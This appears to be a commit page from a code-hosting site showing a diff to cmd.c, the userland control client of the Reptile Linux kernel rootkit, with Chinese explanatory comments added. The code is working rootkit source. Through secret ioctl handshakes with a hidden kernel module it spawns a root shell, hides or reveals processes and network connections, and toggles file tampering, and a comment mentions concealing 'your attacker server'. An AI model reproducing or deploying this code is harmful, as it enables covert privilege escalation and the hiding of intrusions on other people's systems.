py5ktlmgf
/
reptile
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update cmd.c

Browse Source
Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b
1 changed files with 178 additions and 167 deletions
Show Stats Download Patch File Download Diff File

125
src/Reptile/userland/cmd.c
Unescape View File

@ -10,45 +10,61 @@
#include <sys/types.h> #include <sys/types.h>
#include <unistd.h> #include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash" #define SHELL "/bin/bash"
/**
* @brief
*/
struct control { struct control {
unsigned short cmd; unsigned short cmd; // 命令类型
void *argv; void *argv; // 命令参数
}; };
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sockfd; int sockfd; // 套接字文件描述符
struct control args; struct control args; // 控制结构体实例
struct sockaddr_in addr; struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; struct hostent *host; // 主机信息结构体指针
unsigned int pid; unsigned int pid; // 进程ID
char *bash = SHELL; char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
// 如果参数少于2个退出程序
if (argc < 2) if (argc < 2)
exit(0); exit(0);
// 创建TCP套接字
sockfd = socket(AF_INET, SOCK_STREAM, 6); sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0) if (sockfd < 0)
goto fail; goto fail; // 如果创建失败跳转到fail标签
// 如果第一个参数是"root"
if (strcmp(argv[1], "root") == 0) { if (strcmp(argv[1], "root") == 0) {
// 如果已经是root用户提示并关闭套接字后退出
if (geteuid() == 0) { if (geteuid() == 0) {
printf("You are already root! :)\n\n"); printf("You are already root! :)\n\n");
close(sockfd); close(sockfd);
goto out; goto out;
} }
args.cmd = 3; args.cmd = 3; // 设置命令为3
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args); ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA); ioctl(sockfd, AUTH, HTUA);
} }
// 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) { if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n"); printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp); execve(bash, arg, envp);
@ -56,98 +72,101 @@ int main(int argc, char **argv)
printf("\e[00;31mYou have no power here! :( \e[00m\n\n"); printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
} }
goto out; goto out; // 跳转到out标签
} }
// 如果第一个参数是"hide"或"show"
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) { if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
// 如果参数少于2个跳转到fail标签
if (argc < 2) if (argc < 2)
goto fail; goto fail;
// 如果只有一个参数,隐藏或显示所有连接
if (argc == 2) { if (argc == 2) {
args.cmd = 0; args.cmd = 0; // 设置命令为0
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} else { } else { // 如果有两个参数隐藏或显示指定PID的连接
args.cmd = 1; // 设置命令为1
args.cmd = 1; pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
pid = (unsigned int)atoi(argv[2]); args.argv = &pid; // 设置命令参数为PID
args.argv = &pid;
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
} }
// 如果第一个参数是"file-tampering"
if (strcmp(argv[1], "file-tampering") == 0) { if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; args.cmd = 2; // 设置命令为2
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
// 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) { if (strcmp(argv[1], "conn") == 0) {
// 如果参数少于4个跳转到fail标签
if (argc < 4) if (argc < 4)
goto fail; goto fail;
// 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) { if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4; args.cmd = 4; // 设置命令为4
} else if (strcmp(argv[4], "show") == 0) { } else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; args.cmd = 5; // 设置命令为5
} else { } else {
goto fail; goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
} }
// 获取主机信息
host = gethostbyname(argv[2]); host = gethostbyname(argv[2]);
if (host == NULL) if (host == NULL)
goto fail; goto fail; // 如果获取主机信息失败跳转到fail标签
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET; // 复制主机地址到地址结构体中
addr.sin_port = htons(atoi(argv[3])); memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
args.argv = &addr; addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
/* /*
UDPTCP使
// This part is deprecated. There is no reason to hide specific protocols
// when you want to hide some connection, in the most of cases you will
// need to hide every connection and everything about your attacker server.
if (strcmp(argv[1], "udp") == 0) { if (strcmp(argv[1], "udp") == 0) {
if (argc < 4) if (argc < 4)
goto fail; goto fail;
if (strcmp(argv[4], "hide") == 0) { if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6; args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) { } else if (strcmp(argv[4], "show") == 0) {
@ -155,20 +174,13 @@ int main(int argc, char **argv)
} else { } else {
goto fail; goto fail;
} }
host = gethostbyname(argv[2]); host = gethostbyname(argv[2]);
if (host == NULL) if (host == NULL)
goto fail; goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET; addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3])); addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr; args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
@ -177,11 +189,10 @@ int main(int argc, char **argv)
} }
} }
} }
} }*/
*/ fail: // fail标签打印失败信息并关闭套接字
fail:
printf("\e[01;31mFailed!\e[00m\n"); printf("\e[01;31mFailed!\e[00m\n");
out: out: // out标签关闭套接字并返回0表示程序结束
close(sockfd); close(sockfd); // 关闭套接字文件描述符
return 0; return 0; // 返回0表示程序正常结束
} }
Write Preview
Loading…
Cancel
Save